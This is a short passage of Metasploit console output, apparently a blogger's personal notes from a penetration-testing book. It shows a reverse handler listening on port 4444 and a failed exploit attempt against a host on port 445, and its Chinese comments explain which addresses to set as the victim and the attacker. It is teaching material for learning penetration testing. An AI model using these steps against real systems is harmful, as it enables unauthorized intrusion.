[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (www.haotuan.us:445).

root@ieroot:~#

#至于这个例子里面的www.haotuan.us 和www.ieroot.com再试用的时候分别设为目标机器(受害者)的ip和本机ip

#别忘了分别设定端口哦,亲

[/bash]

 

 

//上述内容来自:metasploit the pentration tester’s guide 这本书 ,仅仅为了方便我个人的查阅